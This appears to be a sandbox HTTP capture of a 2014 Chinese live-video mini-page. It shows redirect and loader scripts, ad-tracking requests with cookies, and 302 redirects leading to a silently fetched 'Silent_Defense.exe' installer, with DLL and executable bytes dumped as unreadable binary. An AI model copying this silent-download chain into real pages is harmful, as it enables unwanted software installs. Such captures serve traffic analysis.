.........'.....,........"..9..:....&K.$D.....].0_........X.0^.........
.@~.C.....A.....H.....K..L.....N..N.....R.....V..X.....[.....[..]..`..
..   !!!"""###$$$%%%&&&'''((()))***,,,---...///000111222666<<<
;===>>>@@@BBBCCCDDDEEEFFFGGGHHH.h.............444.d..%I.1a.a.
.......>|....Y.....O.777888999.R...[..%.1b........*.6k.......K.....
..333.!B.E..#G.b...9.c..B..e..f..9o.\...".^..g..C...;.......D..F.....G
...).(O.K..-Z.L.....\..4eIIIKKKLLLMMMOOO.<u.?}555:::...PPPWWWjjj...
.....IDATx^..S....E.=...m[....v..p?......S......8A..J;.T&..g.o..xTzor}
3=.}..M~M..t..e...c........U..z.ZP1y3.....Aa...D..l.jr.s.....2.._&/&wz
r....:.D`.l.T....-....*.Q...g...`..D.E.........g.HL5..P..R.......... x
.=5_7..{Ils.c.....q!....v...[...u.%..u.....z.....L..P...~.Hp..mT8.\K 6
[....q.v..D..8..?Yi./I8.\I.....a[....%.....xJ...I.2.z.>......R..n..
<.....A....cn&.....)./.1....X.a ... .Y..*H..A.T...4......._.2E>V
.M...|.m.@`N...H.:\.#9R^....G...`..'.I.F..C.0;JM.;.O7"))...It0....8...
)..y[....YQn.... ....LAnN.s..RS...m2v....6....IEND.B`.....


GET /livevideo/v3.11.67/scripts/new_box.js HTTP/1.1


Accept: */*
Referer: hXXp://mini.fengyunzhibo.com/mini/fymini.htm?f=aiqingzhihui&code=null
Accept-Language: en-us
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 2.0.50727; .NET CLR 3.0.04506.648; .NET CLR 3.5.21022; .NET4.0C)
Host: static.ws.kukuplay.com
Connection: Keep-Alive


HTTP/1.1 200 OK
Expires: Sun, 02 Jun 2024 07:39:13 GMT
Date: Thu, 05 Jun 2014 07:39:13 GMT
Server: pws/1.4.2.9
Content-Type: application/x-javascript
Content-Length: 3258
Last-Modified: Thu, 05 Jun 2014 05:10:03 GMT
ETag: "538ffbab-cba"
Cache-Control: max-age=315360000
Accept-Ranges: bytes
Age: 1
X-Via: 1.1 zjjhdx34:88 (Cdn Cache Server V2.0), 1.1 dls21:6 (Cdn Cache Server V2.0)
Connection: keep-alive
window.newbox={};(function(){document.domain=document.location.hostnam
e.match(/([^\.] \.com\.cn)|([^\.] \.com)/)[0];var A;var B=C("iframe")[
0];window.newbox=function(){A=this;this.init()};newbox.prototype={_isP
lay:false,constructor:newbox,init:function(){this.initEvent()},setplay
:function(D){A._isPlay=D},initEvent:function(){$("#close-flow").live("
click",function(){A.close()});$(".over-flow").live("click",function(E)
{A.close()});var D=!-[1,];$(".iframe-panel").live("click",function(E){
E=E?E:window.event;if(D){E.cancelBubble=true}else{if(E){E.stopPropagat
ion()}}})},show_div:function(G){var E=$("#" G);var F=E.width();var D=E
.height();A.showcontent(E,F,D)},showframe:function(J,I,E){$(".over-flo
w").empty().append("<div class='iframe-panel'><div id='close-
flow'></div><div class='loding-panel'></div></
div>");var G=$(window).scrollTop();$("html").css({"overflow":"hidde
n"});var D=$(window).height();var K=$(window).width();var H,L;H=K>I
?K/2-(I/2):0;D>E?L=D/2-(E/2):L=0;L=L>80?L:100;$(".over-flow").cs
s({"height":(D G) "px","top":(G/2) "px","overflow-y":"auto","overflow-
x":"hidden"}).fadeIn(200);$(B)[0].onload=function(){};$(B)[0].onreadys
tatechange=function(){if(this.readyState&&this.readyState=="complete")
{}};$(B).attr({scrolling:"no",src:J,width:I,height:E,"class":"testIfra
me",allowFullScreen:true,webkitAllowFullScreen:true,mozallowfullscreen
:true,frameBorder:"0"}).appendTo($(".iframe-panel"));var F=(L) G/2;$("
.iframe-panel").css({width:I,"left":H "px","top":F "px"});window.f
<<< skipped >>>

GET /livevideo/v3.11.67/images/mini/mini.png HTTP/1.1


Accept: */*
Accept-Encoding: gzip, deflate
If-Modified-Since: Thu, 05 Jun 2014 05:10:07 GMT
If-None-Match: "538ffbaf-429"
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 2.0.50727; .NET CLR 3.0.04506.648; .NET CLR 3.5.21022; .NET4.0C)
Host: static.ws.kukuplay.com
Connection: Keep-Alive


HTTP/1.0 304 Not Modified
Date: Thu, 05 Jun 2014 07:39:13 GMT
Content-Type: image/png
Expires: Sun, 02 Jun 2024 07:39:13 GMT
Last-Modified: Thu, 05 Jun 2014 05:10:07 GMT
ETag: "538ffbaf-429"
Cache-Control: max-age=315360000
Age: 1
X-Via: 1.0 dls19:9 (Cdn Cache Server V2.0)
Connection: keep-alive
HTTP/1.0 304 Not Modified..Date: Thu, 05 Jun 2014 07:39:13 GMT..Conten
t-Type: image/png..Expires: Sun, 02 Jun 2024 07:39:13 GMT..Last-Modifi
ed: Thu, 05 Jun 2014 05:10:07 GMT..ETag: "538ffbaf-429"..Cache-Control
: max-age=315360000..Age: 1..X-Via: 1.0 dls19:9 (Cdn Cache Server V2.0
)..Connection: keep-alive..



GET /zhibo2.html?id=pczh_107_306.exe&en=1320146&go= HTTP/1.1
Accept: image/gif, image/x-xbitmap, image/jpeg, image/pjpeg, application/x-shockwave-flash, application/x-ms-application, application/x-ms-xbap, application/vnd.ms-xpsdocument, application/xaml xml, */*
Accept-Language: en-us
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 2.0.50727; .NET CLR 3.0.04506.648; .NET CLR 3.5.21022; .NET4.0C)
Host: tv.aiqingzhihui.com
Connection: Keep-Alive


HTTP/1.1 200 OK
Date: Fri, 13 Jun 2014 17:28:44 GMT
Content-Length: 1916
Content-Type: text/html
Last-Modified: Thu, 20 Mar 2014 02:01:37 GMT
Connection: Keep-Alive
ETag: "dcafdf53e043cf1:206c"
Accept-Ranges: bytes
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Fw-Via: DISK HIT from cnc-sd-010-065.fcd, DISK HIT from cnc-tj-021-036.fcd
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "htt
p://VVV.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">..<html xm
lns="hXXp://VVV.w3.org/1999/xhtml">..<head>..<meta http-eq
uiv="Content-Type" content="text/html; charset=gb2312" />..<titl
e></title>..<style>..body{background:#000000; overflow-
x:hidden; overflow-y:hidden; margin:0; padding:0; border:1px;TEXT-ALIG
N: center;}..html { overflow-x: hidden; overflow-y: hidden; }..</st
yle>..</head>..<body scroll="no">..<div style="width
:1024px;height:550px;margin:0 auto;overflow-x:hidden; overflow-y:hidde
n;">..<div style="position:absolute; top:0;margin:0 auto;display
:none" id="gg70"><iframe name='ip' id='ip' src="" frameborder="0
" width=1012 height=550></iframe></div>..<div id="fe
ng-yun-mini-wrap" style="width:1010px;MARGIN-RIGHT: auto; MARGIN-LEFT:
 auto;">..<a id="loading-info" href="hXXp://VVV.fengyunzhibo.com
" target="_blank">...........................</a>            
        ..</div>..<script type="text/javascript">window.fe
ngyunminicongf={tuiguangid:"aiqingzhihui",width:1010,height:550}</s
cript>..<script type="text/javascript" src="hXXp://static.m0dlcd
n.kukuplay.com/support/mini/fyminiloader-min.js"></script>..&
lt;/div>..<script language="JavaScript">..if(window!=top)top.
location.href=location.href;var href=window.location.href;var en=/go=(
[0-9a-z_-] )/i;..var ss;..if(href.search(en)!=-1){s=href.match(en)
<<< skipped >>>


GET /sw-search-shadu/client/dllv4/BDMReport.dll HTTP/1.1
Accept: */*
Accept-Language: zh-CN,zh,en-US
Connection: Keep-Alive
Host: dlsw.baidu.com
Range: bytes=1081344-
Referer: hXXp://dlsw.baidu.com/
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; .NET CLR 2.0.50727; .NET CLR 3.0.04506.648; .NET CLR 3.5.21022; .NET4.0C)


HTTP/1.1 206 Partial Content
Server: JSP2/1.0.27
Date: Fri, 13 Jun 2014 17:28:55 GMT
Content-Type: application/x-msdownload
Connection: close
Content-Length: 126176
Content-Range: bytes 1081344-1207519/1207520
Access-Control-Allow-Origin: *
Access-Control-Allow-Methods: HEAD, GET, OPTIONS, PUT, POST, DELETE
Access-Control-Expose-Headers: Content-Length, ETag, x-bs-request-id, x-pcs-request-id
Access-Control-Allow-Headers: Range, Origin, Content-Type, Accept, Content-Length
Accept-Ranges: bytes
Last-Modified: Tue, 20 Aug 2013 07:03:07 GMT
Expires: Sat, 14 Jun 2014 07:20:40 GMT
x-bs-version: A65F70E089635AE47A1E2AED4F13B889
ETag: 30cbc602ada7cdfb0346038c05996d84
x-bs-request-id: MTAuMjE0LjQyLjIyOjgwODA6MTQ3NzYzMjU5MToxMS9KdW4vMjAxNCAxNToyMDo0MCA=
x-bs-meta-crc32: 2965621797
Content-MD5: 30cbc602ada7cdfb0346038c05996d84
x-bs-client-ip: MTE1LjIzMS40Mi4xMjA=
.... ...@...`.......................0...P...p...............0...P...p.
.................. ...[...............<...k............... ...[....
.......................t.......C...............w...6..................
.K...................H...x...............F...{...............8...p....
.......3...............6...y...........9...h..........................
.....H...........2...v...u...g...........l.......Y...................;
...k...............(...X...........9...........[...........9...s......
.....9...y...........(...X...............#...S...............#...^....
...........)[email protected]..
.........9...y...........9...y...........9...y...........9...y........
...9...y...............8...`...................@...{...............;..
.k...........I...............H...............(...i............... ...i
............... ...X...................H...{...............C...k......
......... ...X...............#...K...............#...K...............#
...^............... ...c............... ...i............... ...[......
.........................3...n............ ..H ... ... ...!..K!..{!...
!...!..."..;"..y"..."...#...$..I$...$...$...%.. %..i%...%...%...&..Y&.
..&...&...'..Y'...'...'...(..Y(...(...(..))..y)...)...*..I*...*...*..)
 ..i ... ... ..I,...,...,...,..3-..i-...-...-......Y............/..Y/.
../.../..M0...0...0..91..y1...1...1..32...2...2...3..33..h3...3...3...
4..P4...4...4...4..95..q5...5...5...6..86..`6...6...6...6...7..L7...7.
..7...7..08..`8...8...8...8..(9..X9...9...9...:..P:..{:...:...:...
<<< skipped >>>


GET /media/v1/0f000KQDyCuvJFLfvix_cf.png HTTP/1.1
Accept: */*
Accept-Language: en-US
Referer: hXXp://ubmcmm.baidustatic.com/media/v1/0f0002EBaHfWMpy9Ew2v2s.swf?url_type=1&id_555316071=media/v1/0f000rmn6cn7D14hDeZLyf.gif&id_5553832
x-flash-version: 11,6,602,168
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 2.0.50727; .NET CLR 3.0.04506.648; .NET CLR 3.5.21022; .NET4.0C)
Host: ubmcmm.baidustatic.com
Connection: Keep-Alive


HTTP/1.1 200 OK
Server: JSP2/1.0.27
Date: Fri, 13 Jun 2014 17:29:15 GMT
Content-Type: image/png
Connection: close
Content-Length: 5804
Cache-Control: max-age=31536000
Expires: Fri, 13 Mar 2015 10:29:01 GMT
Last-Modified: Sat, 25 Apr 2009 07:04:00 GMT
media: media
.PNG........IHDR.....................gAMA....7.......tEXtSoftware.Adob
e ImageReadyq.e<....PLTE...................Xf....B8..z.............
...%...........:4.%..gi.HF.:L.]d......./1.......a_.JF.=D.)&....RK.....
.....3,.......XV.sy.<@.VR....&'.............SY.......$&..........5:
.')s28........ .C8....ju....ED....*#.5:.`e.......Wc.!..XW.z.....PQ.BG.
%..MU.............t..*...!....IP.~v....QI. ..tu.nn.......MW.......:<
;.-2....cj.L].}....."".hr.......ei.mw.......5).y........-7.4'. 1.EW.7=
..........9=..........JI....WH.......x}....MS....|..&8....#$....hw."..
...&..D=..........We.......q`.&!.. ....JM....k..$6.......2(....%......
..,3.0.....{l....aU.U[.ui.......! ................cs....* .aT.OK..../.
....QR.......,0................)..]g.!..us..}....'*........%....,.....
..........................[u...........]c.............................
....._D................<f./#...fA."....tRNS........................
......................................................................
......................................................................
......................................................................
......................S..%[email protected] ...$.$C...B0B.B..K.I..
[email protected].....$.Q......p.....X.H......b.[.}}.....m..M.W....`!....aI.0.....
......D."....A. r.9..D.".......E. r../ ....n.q..._.......^./... f...5.
...i..RO.....e3...ZW....H.j.P9.p....R...l...`...P..h<........nMLL&l
t;.uo#.S.i.q....M..k.DQs..K.&k......j...4...:..4^[email protected]...
....}jK@..({@.A.........P<.......WQn&s~...4..uZr..S.d.J{'.^|(9.
<<< skipped >>>


GET /go/full/1/70745 HTTP/1.1
Accept: */*
Accept-Language: zh-CN,zh,en-US
Connection: Keep-Alive
Host: w.x.baidu.com
Range: bytes=23199744-
Referer: hXXp://w.x.baidu.com/
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; .NET CLR 2.0.50727; .NET CLR 3.0.04506.648; .NET CLR 3.5.21022; .NET4.0C)


HTTP/1.1 302 Moved Temporarily
Server: nginx/1.4.3
Date: Fri, 13 Jun 2014 17:29:23 GMT
Content-Type: text/html; charset=utf-8
Connection: close
X-Powered-By: PHP/5.3.2
Location: hXXp://dl1sw.baidu.com/client/ws1215/0611/BaiduAn_Setup_1.0.647.511_Sid_55555_Silent_Defense.exe



GET /ecom?di=u1537511&dcb=BAIDU_DUP2_define&dtm=BAIDU_DUP2_SETJSONADSLOT&dbv=0&dci=0&dri=0&dis=0&dai=2&dds=&drs=3&dvi=1401358918<u=http://VVV.mnh.quzhao.com/x/mnh/mini/q428/mini_mnh_428.html?1?id=0&liu=<r=http://VVV.mnh.quzhao.com/x/mnh/mini/q428/mnh_428cc.html&lcr=&ps=-2x-2&psr=1276x846&par=1276x818&pcs=758x450&pss=758x493&pis=-1x-1&cfv=11&ccd=32&chi=1&cja=true&cpl=0&cmi=0&cce=true&col=en-us&cec=utf-8&cdo=-1&tsr=1468&tlm=1398686606&tcn=1402680569&tpr=1402680568181&dpt=none&coa=&baidu_id= HTTP/1.1
Accept: */*
Referer: hXXp://VVV.mnh.quzhao.com/x/mnh/mini/q428/mini_mnh_428.html?1?id=0
Accept-Language: en-us
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 2.0.50727; .NET CLR 3.0.04506.648; .NET CLR 3.5.21022; .NET4.0C)
Host: pos.baidu.com
Connection: Keep-Alive
Cookie: BAIDUID=49F93F86C60D03A8D23F3919153C48A7:FG=1; ISBID=49F93F86C60D03A8D23F3919153C48A7:FG=1; ISUS=1; CPROID=49F93F86C60D03A8D23F3919153C48A7:FG=1; BAIDUID=D1F510B78251BF62B517A49EAEC89AE3:FG=1


HTTP/1.1 200 OK
Server: nginx
Date: Fri, 13 Jun 2014 17:29:24 GMT
Content-Type: text/javascript;charset=UTF-8
Content-Length: 1244
Connection: Keep-Alive
Expires: Mon, 26 Jul 1997 05:00:00 GMT
Last-Modified: Sat Jun 14 01:29:24 2014
Cache-Control: post-check=0, pre-check=0
Pragma: no-cache
P3P: CP=" OTI DSP COR IVA OUR IND COM "
BAIDU_DUP2_define('request!u1537511_0',[],{deps:['nova/painter/inlayFi
xed1392089005'],data:{"id" : "u1537511","_isMlt" : 4,"sw" : 336,"sh" :
 280,"_html" : {"cec":"utf-8", "dai":"2", "cfv":"11", "cpa":"1", "col"
:"en-us", "dis":"0", "xuanting":"0", "n":"67025059_1_cpr", "conOP":"0"
, "scale":"", "skin":"", "rsi0":"336", "rsi1":"280", "rsi5":"4", "ltr"
:"hXXp://VVV.mnh.quzhao.com/x/mnh/mini/q428/mnh_428cc.html", "ltu":"ht
tp://VVV.mnh.quzhao.com/x/mnh/mini/q428/mini_mnh_428.html?1?id=0", "pc
s":"758x450", "rss0":"#FFFFFF", "rss1":"#FFFFFF", "rss2":"#0000FF", "r
ss3":"#444444", "rss4":"#008000", "rss5":"", "rss6":"#e10900", "rss7":
"", "rad":"", "pis":"10000x10000", "aurl":"", "psr":"1276x846", "pss":
"758x493", "tpr":"1402680568181", "lunum":"6", "ch":"0", "at":"6", "qn
":"791141dc1b3cdefb", "ps":"-2x-2", "tn":"text_default_336_280", "ts":
"1", "td_id":"1537511", "adn":"3", "cad":"1", "ccd":"32"},"_html_old" 
: "cpro_client=67025059_1_cpr|cpro_template=text_default_336_280|cpro_
lunum=6|cpro_h=280|cpro_w=336|cpro_xuanting=0|cpro_at=image|cpro_cbd=#
FFFFFF|cpro_cbg=#FFFFFF|cpro_ctitle=#0000FF|cpro_cdesc=#444444|cpro_cu
rl=#008000|cpro_cflush=#e10900|cpro_161=3|cpro_flush=4|cpro_cad=1","qn
" : "791141dc1b3cdefb","_qid" : "791141dc1b3cdefb"}});....
<<< skipped >>>

GET /ecom?cec=utf-8&dai=2&cfv=11&cpa=1&col=en-us&dis=0&xuanting=0&n=67025059_1_cpr&conOP=0&scale=&skin=&rsi0=336&rsi1=280&rsi5=4&ltr=http://VVV.mnh.quzhao.com/x/mnh/mini/q428/mnh_428cc.html&ltu=http://VVV.mnh.quzhao.com/x/mnh/mini/q428/mini_mnh_428.html?1?id=0&pcs=758x450&rss0=#FFFFFF&rss1=#FFFFFF&rss2=#0000FF&rss3=#444444&rss4=#008000&rss5=&rss6=#e10900&rss7=&rad=&pis=10000x10000&aurl=&psr=1276x846&pss=758x493&tpr=1402680568181&lunum=6&ch=0&at=6&qn=791141dc1b3cdefb&ps=-2x-2&tn=text_default_336_280&ts=1&td_id=1537511&adn=3&cad=1&ccd=32&dtm=BAIDU_DUP2_SETJSONADSLOT&dc=2&di=u1537511 HTTP/1.1


Accept: image/gif, image/x-xbitmap, image/jpeg, image/pjpeg, application/x-shockwave-flash, application/x-ms-application, application/x-ms-xbap, application/vnd.ms-xpsdocument, application/xaml xml, */*
Referer: hXXp://VVV.mnh.quzhao.com/x/mnh/mini/q428/mini_mnh_428.html?1?id=0
Accept-Language: en-us
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 2.0.50727; .NET CLR 3.0.04506.648; .NET CLR 3.5.21022; .NET4.0C)
Host: pos.baidu.com
Connection: Keep-Alive
Cookie: BAIDUID=49F93F86C60D03A8D23F3919153C48A7:FG=1; ISBID=49F93F86C60D03A8D23F3919153C48A7:FG=1; ISUS=1; CPROID=49F93F86C60D03A8D23F3919153C48A7:FG=1; BAIDUID=D1F510B78251BF62B517A49EAEC89AE3:FG=1


HTTP/1.1 200 OK
Server: nginx
Date: Fri, 13 Jun 2014 17:29:24 GMT
Content-Type: text/html
Content-Length: 10844
Connection: Keep-Alive
Expires: Mon, 26 Jul 1997 05:00:00 GMT
Last-Modified: Sat Jun 14 01:29:24 2014
Cache-Control: post-check=0, pre-check=0
Pragma: no-cache
P3P: CP=" OTI DSP COR IVA OUR IND COM "
HTTP/1.1 200 OK..Server: nginx..Date: Fri, 13 Jun 2014 17:29:24 GMT..C
ontent-Type: text/html..Content-Length: 10844..Connection: Keep-Alive.
.Expires: Mon, 26 Jul 1997 05:00:00 GMT..Last-Modified: Sat Jun 14 01:
29:24 2014..Cache-Control: post-check=0, pre-check=0..Pragma: no-cache
..P3P: CP=" OTI DSP COR IVA OUR IND COM "..<!DOCTYPE html PUBLIC "-
//W3C//DTD XHTML 1.0 Transitional//EN" "hXXp://VVV.w3.org/TR/xhtml1/DT
D/xhtml1-transitional.dtd">..<html xmlns="hXXp://VVV.w3.org/1999
/xhtml">..<head>..<!-- 0|1; -->..<meta http-equiv="C
ontent-Type" content="text/html; charset=UTF-8" />..<meta http-e
quiv="X-UA-Compatible" content="IE=7" />..<title>............
..................</title>..<script language="javascript" src
="hXXp://cpro.baidu.com/extra/text_flash/AC_RunActiveContent.js">&l
t;/script>..<style>..body{margin:0;padding:0;}...uptown{posit
ion:relative;width:336px;height:280px;}...uptown #dish0{width:336px;he
ight:280px;position:absolute;top:0;left:0;background-color:#fff;opacit
y:0;filter:alpha(opacity=0);}...uptown #dish1{width:336px;height:280px
;position:absolute;top:0;left:0;border:#FFFFFF solid 1px; }..a.logo{di
splay:block;height:18px;width:26px;text-align:justify;letter-spacing:2
0px;text-decoration:none;overflow:hidden;cursor:default;position:absol
ute;bottom:0px;right:0px;z-index:10;}...cpro a.logo{filter:progid:DXIm
ageTransform.Microsoft.AlphaImageLoader(enabled=true, src="hXXp://cpro
.baidu.com/img/cpro_media_small.png", sizingMet<!DOCTYPE html P
<<< skipped >>>

GET /wh/o.htm?ltr=http://VVV.mnh.quzhao.com/x/mnh/mini/q428/mnh_428cc.html&cf=u HTTP/1.1


Accept: image/gif, image/x-xbitmap, image/jpeg, image/pjpeg, application/x-shockwave-flash, application/x-ms-application, application/x-ms-xbap, application/vnd.ms-xpsdocument, application/xaml xml, */*
Referer: hXXp://VVV.mnh.quzhao.com/x/mnh/mini/q428/mini_mnh_428.html?1?id=0
Accept-Language: en-us
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 2.0.50727; .NET CLR 3.0.04506.648; .NET CLR 3.5.21022; .NET4.0C)
Host: pos.baidu.com
Connection: Keep-Alive
Cookie: BAIDUID=49F93F86C60D03A8D23F3919153C48A7:FG=1; ISBID=49F93F86C60D03A8D23F3919153C48A7:FG=1; ISUS=49F93F86C60D03A8D23F3919153C48A7:FG=1; CPROID=49F93F86C60D03A8D23F3919153C48A7:FG=1; BAIDUID=D1F510B78251BF62B517A49EAEC89AE3:FG=1


HTTP/1.1 200 OK
Server: nginx
Date: Fri, 13 Jun 2014 17:29:32 GMT
Content-Type: text/html
Content-Length: 426
Last-Modified: Fri, 11 Apr 2014 09:06:00 GMT
Connection: Keep-Alive
ETag: "5347b078-1aa"
P3P: CP=" OTI DSP COR IVA OUR IND COM "
Accept-Ranges: bytes
<!DOCTYPE html>.<html>.    <head></head>.    &
lt;body>.        <style>.            .userData {behavior:url(
#default#userdata);}.            .client {behavior:url(#default#client
Caps);}.        </style>.        <div id="oPersistDiv" class=
"userData"></div>.        <div id="clientDiv" class="clien
t"></div>.        <div id="oFlashDiv"></div>.    
    <script src="hXXp://dup.baidustatic.com/tpl/wh.js"></scri
pt>.    </body>.</html>..



GET /sync.htm?cproid=49F93F86C60D03A8D23F3919153C48A7:FG=1 HTTP/1.1
Accept: image/gif, image/x-xbitmap, image/jpeg, image/pjpeg, application/x-shockwave-flash, application/x-ms-application, application/x-ms-xbap, application/vnd.ms-xpsdocument, application/xaml xml, */*
Referer: hXXp://pos.baidu.com/ecom?cec=utf-8&dai=2&cfv=11&cpa=1&col=en-us&dis=0&xuanting=0&n=67025059_1_cpr&conOP=0&scale=&skin=&rsi0=336&rsi1=280&rsi5=4<r=<u=http://VVV.mnh.quzhao.com/x/mnh/mini/q428/mini_mnh_428.html?spid=-37237366455960&pcs=758x450&rss0=#FFFFFF&rss1=#FFFFFF&rss2=#0000FF&rss3=#444444&rss4=#008000&rss5=&rss6=#e10900&rss7=&rad=&pis=10000x10000&aurl=&psr=1276x846&pss=758x493&tpr=1402680537275&lunum=6&ch=0&at=6&qn=6dc8052231d438f7&ps=-2x-2&tn=text_default_336_280&ts=1&td_id=1537511&adn=3&cad=1&ccd=32&dtm=BAIDU_DUP2_SETJSONADSLOT&dc=2&di=u1537511
Accept-Language: en-us
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 2.0.50727; .NET CLR 3.0.04506.648; .NET CLR 3.5.21022; .NET4.0C)
Host: cpro.baidustatic.com
Connection: Keep-Alive


HTTP/1.1 200 OK
Server: nginx
Date: Fri, 13 Jun 2014 17:29:04 GMT
Content-Type: text/html
Last-Modified: Wed, 07 May 2014 11:40:06 GMT
Transfer-Encoding: chunked
Connection: close
P3P: CP=" OTI DSP COR IVA OUR IND COM "
Content-Encoding: gzip
37d.............VQo.6.~..`.. 3.Z.=.v.......d.C...E.mn.$.T.....QtmI.\..
.lQ....w..9z}.qz....,.*{.j...?..h.2}7..GC...:...V.]:..%...... .. .;=..
*.......s#[email protected]^..."',..[K.i.P5-T....e@:....1.k_....V..u."...........j.
..9......(.....6".........0.T...kc.t.....z..D.p...Ow0..:......(..H.u..
..^....aq.P2..<.N./$./.../......o8...@1%v5........I_.....%..29...c{
......./=....# 1.R......Z%`(..k....E.....=9G.".<.n..X*...GH.6.G.R.S
...5Q.eR..-...!..zg#<#..S0.z.sV...W.......|..lu%.s%u.L.z.t..P..*.A5
.i.>...Lv%.s...I...63.......P.7....." ..'b.....Ub.ao.XI..,9L...2...
dBRPE.../......#).,G0..1h x......I.P.r}(..L.E..........u-7`|.].&.X...f
.,F.g1.(Nb.o...R....d........2:...xyN.1.dnZ.N>d...z.M.........H.N .
...;g..t.A....j.9!..........3..^&.....ZoZ.M....G..H...Jv..o..fz.Q7....
-...W.....,..y.v. ..../.i....1...s..>....[.&.u.?..6...*....3.q.../.
;.I.|.o..>.I..Rv....c.)'.v.2f.Q&.98..L..C.......Uc..kh....ps}.WZ...
...........0..



GET /auto/images/nav_bg.gif HTTP/1.1
Accept: */*
Referer: hXXp://VVV.mnh.quzhao.com/x/mnh/mini/q428/mnh_428cc.html
Accept-Language: en-us
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 2.0.50727; .NET CLR 3.0.04506.648; .NET CLR 3.5.21022; .NET4.0C)
Host: img.liufen.com
Connection: Keep-Alive


HTTP/1.1 200 OK
Content-Type: image/gif
Last-Modified: Fri, 11 Apr 2014 05:57:18 GMT
Accept-Ranges: bytes
ETag: "791956e54a55cf1:0"
Server: Microsoft-IIS/7.5
X-Powered-By: ASP.NET
Date: Fri, 13 Jun 2014 17:28:18 GMT
Content-Length: 11397
GIF89a................................jj.........................h....
.......V..........mmm.......((A...e..........................aa......l
........a...SS...Z......:u....H~.......{{.......J...........f.K.......
..s...........qq.~~z........^..|.....uuu.............44...............
}..T.....}}}......V.....>............v..............EEG..ccc..a....
...........:|.ddd.II......xxx.X.................v...........;v.,k.,l..
..........................99.............w.......VVV....ZZ.... k.Y....
....GG.........<}...........I.............P........=~.............I
...BB;}.......H...........................u...........u...............
.Y..v.........................................O.........;v............
.......gg........................f.....S......8s......................
.................!.......,................O A....$.. C...JtH1.D...b...
c...9..x.$..#S.\y..H./]..Is.M.2q..y.f..>y*..3.Q.H.&%.T.Q.P.>...i
..V.f..........J.kW.g..5..m[.e....v.[.w....Wn_.~.....oa....5.X1....'.,
.2d../S.j9.g..7....si..I........c.>.{v...i.....o.......6.... O.|.r.
..C.).:....g........w..N~......?/..........q..................g`...w`.
.&.`..6.aN.V....b.`..r4.. ~(.......%....(...j-..../..b.%....<....?.
c..D.Y..F..$.L.x..K..d.PN.$.X..e.[^.e.`..f.dri..f>t..e~.f.pF...m.i.
.E.Y'.z..go.....{.......'......."...!J....f..P.&....R*....z)...g*....j
.p..*.............v. ........;.....,..6..|.2......,..f....F.m...y.....
.O...m...en..~.o...ko..................I0..'\.j...p..:....O....C\q..o.
1..v..."w.1.'.,n.,{.r.-..r.y.<..(.z..6....<[email protected]#=..EO.
<<< skipped >>>


GET /go/full/1/70745 HTTP/1.1
Accept: */*
Accept-Language: zh-CN,zh,en-US
Connection: Keep-Alive
Host: w.x.baidu.com
Range: bytes=16252928-
Referer: hXXp://w.x.baidu.com/
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; .NET CLR 2.0.50727; .NET CLR 3.0.04506.648; .NET CLR 3.5.21022; .NET4.0C)


HTTP/1.1 302 Moved Temporarily
Server: nginx/1.4.3
Date: Fri, 13 Jun 2014 17:29:31 GMT
Content-Type: text/html; charset=utf-8
Connection: close
X-Powered-By: PHP/5.3.2
Location: hXXp://dl1sw.baidu.com/client/ws1215/0611/BaiduAn_Setup_1.0.647.511_Sid_55555_Silent_Defense.exe



GET /client/ws1215/0611/BaiduAn_Setup_1.0.647.511_Sid_55555_Silent_Defense.exe HTTP/1.1
Accept: */*
Accept-Language: zh-CN,zh,en-US
Connection: Keep-Alive
Host: dl1sw.baidu.com
Range: bytes=7864320-
Referer: hXXp://w.x.baidu.com/
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; .NET CLR 2.0.50727; .NET CLR 3.0.04506.648; .NET CLR 3.5.21022; .NET4.0C)


HTTP/1.0 206 Partial Content
Expires: Sun, 13 Jul 2014 16:05:00 GMT
Date: Fri, 13 Jun 2014 16:05:00 GMT
Server: nginx
Content-Type: application/octet-stream
Last-Modified: Tue, 10 Jun 2014 19:14:19 GMT
Cache-Control: max-age=2592000
Accept-Ranges: bytes
Content-Range: bytes 7864320-30927031/30927032
Content-Length: 23062712
Age: 5063
Via: 1.0 sdytwt86:80 (Cdn Cache Server V2.0), 1.0 tswt76:80 (Cdn Cache Server V2.0), 1.0 jg11:8888 (Cdn Cache Server V2.0)
Connection: close
Content-Disposition: attachment;filename="BaiduAn_Setup_1.0.647.511_Sid_55555_Silent_Defense.exe"
P..9..g..j.R.;.. .d..-f.E.6.T.Mr-...q..).M.j.,....3............(6.....
l.v.(.,..>.4/.....^..q.I...?.\.....L..S....l..P..i....{...T....eQ.t
.vwB..jV]t..=.D.M.O.Yf.....O<7 ...H...W..........4....`......Kk....
....8.D..^.........-..n4~el..... .........L..P_.Gf..9..v..........c..|
...h.M.)...{2.A|.e?z....._..O.X.,.!.."[email protected].[..F..u.Y%..L.).....L
..)....8V.^&h/.*c!..(......\z3...d......q.by.7..>-!........Ow......
.M..::{U..(.Y.?.;G..".04.A..9a......~.D..<.....(e<^..w...U.....i
*M.D..........S.Cy..l^4'...wn.20X..K........`...x....&...b.b.....s..U.
t...H..g....0..%.P....7.E.].iS.u.t...f>)...b.........g..6.....C.XPL
